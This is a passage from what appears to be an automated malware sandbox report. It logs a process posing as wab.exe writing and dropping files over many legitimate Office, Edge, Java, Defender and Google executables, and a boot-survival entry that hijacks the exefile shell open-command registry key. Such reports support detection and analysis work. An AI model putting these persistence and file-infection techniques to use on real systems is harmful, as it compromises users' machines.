              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Windows\svchost.comJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Temp\chrome.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Windows\svchost.comJump to dropped file

              Boot Survival

              barindex
              Creates an undocumented autostart registry key
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULLJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULLJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
